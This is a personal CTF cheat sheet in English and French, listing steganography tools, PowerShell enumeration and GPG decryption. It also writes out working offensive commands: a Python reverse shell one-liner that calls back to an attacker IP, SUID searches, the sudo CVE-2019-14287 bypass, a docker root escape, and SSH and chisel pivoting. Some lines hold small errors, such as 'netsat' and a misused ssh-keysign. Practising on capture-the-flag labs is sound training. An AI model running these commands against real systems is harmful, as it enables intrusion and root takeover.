Author: Winiga Youssouf
Nickname: Spyd3r
Email: youssoufwiniga@gmail.com


##################################### OFFENSIVE & DEFENSIVE SECURITY :: CTF CHALLENGES :: NOTES ########################################

                                            
                                            <-- STEGANOGRAPHY -->

                                                >>> AUDIO <<<

- Audio Stegano
- Audacity
- Sonic Visualizer


                                                >>> IMAGE <<<

- Jsteg (jpeg)
- Zsteg (png, bmp)
- Stegseek
- Steghide
- Stegcracker




############################## WINDOWS POWERSHELL COMMANDS ###############################


system informations:


 Get-ComputerInfo -Property "Os*"
 Get-LocalUser

 #first ip connected
 HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Run

 #accounts had administrative privileges
 Get-LocalGroupMember -Group “Administrators”

 #scheduled task
 Get-ScheduledTask | where {$_.TaskPath -eq “\”}

 #Task executed
 $task = Get-ScheduledTask | Where TaskName -EQ “Clean file system”



 ######################################## GPG DECRYPT ###################################

#Ajouter la clé à GPG
gpg --import private.asc

#Voir la liste des clé
gpg --list-secret-keys

#Décrypter le fichier
gpg --decrypt backup.pgp


###################################### REVERSE SHELLS ###################################


Python Reverse Shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'




##################################### PRIVESC ##########################################

#chercher les bibaire avec le bit SUID
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -type  f 2>/dev/null
find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>>/dev/null

#chercher les binaire qui peuvent être exécuter avec le groupe <groupe_name>
find / -group admin -perm /g=x 2>/dev/null





##################################### REGEX TRICKS ######################################


sed -n 's/.*://p' fowsniff.txt > hashes.txt
awk -F'@' '{print $1}' fowsniff.txt > users.txt
sed -n 's/.*://p' cracked.txt > pass.txt


##################################### EXPLOIT ########################################

#sudo version 1.8.27 (CVE-2019-14287) ::: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash

#docker exploit
docker run -v /:/mnt --rm -it alpine chroot /mnt sh


##################################### UPLOAD FILE #########################################

#Avec netcat
nc 10.10.132.122 7777 > user.jpg
nc -q 5 -lvnp 7777 < user.jpg


##################################### FIREFOX TRICKS #######################################

#allow ports
network.security.ports.banned.override


##################################### CURL TRICKS #########################################

#faire une requête en spécifiant le user-agent
curl -A "<user-agent>" -L <ip_address>




#################################### SHELL STABILISATION ###################################

#using python pty
python3 -c "import pty;pty.spawn('/bin/bash')"


#dans mon shell
stty raw -echo;fg

#dans le shell de la victime
stty rows 29 columns 126
export TERM=screen

#################################### ENUMERATION TOOLS #################################

-chisel
-linpeas
-pspy
-netsat -ano

#################################### PIVOTING AND PORT FORWARDING ######################

#port forwarding using SSH

-target side:
    #create SSH key pair
    ssh-keysign -f <username>
    #copied the public key to the authorized_keys
    cd ~/.ssh
    echo "<public_key" > authorized_keys
    chmod 600 <private key>


-attacker side
ssh -L <reverse_port>:127.0.0.1:<port> -i <private_key> <username>@<target_ip_address>

#port forwarding using chisel

-target side:
./chisel client <attaquer_ip>:<exposed_port> R:<reverse_port>:127.0.0.1:<listen_port>

-attacker side
./chisel server --reverse --port <exposed_port>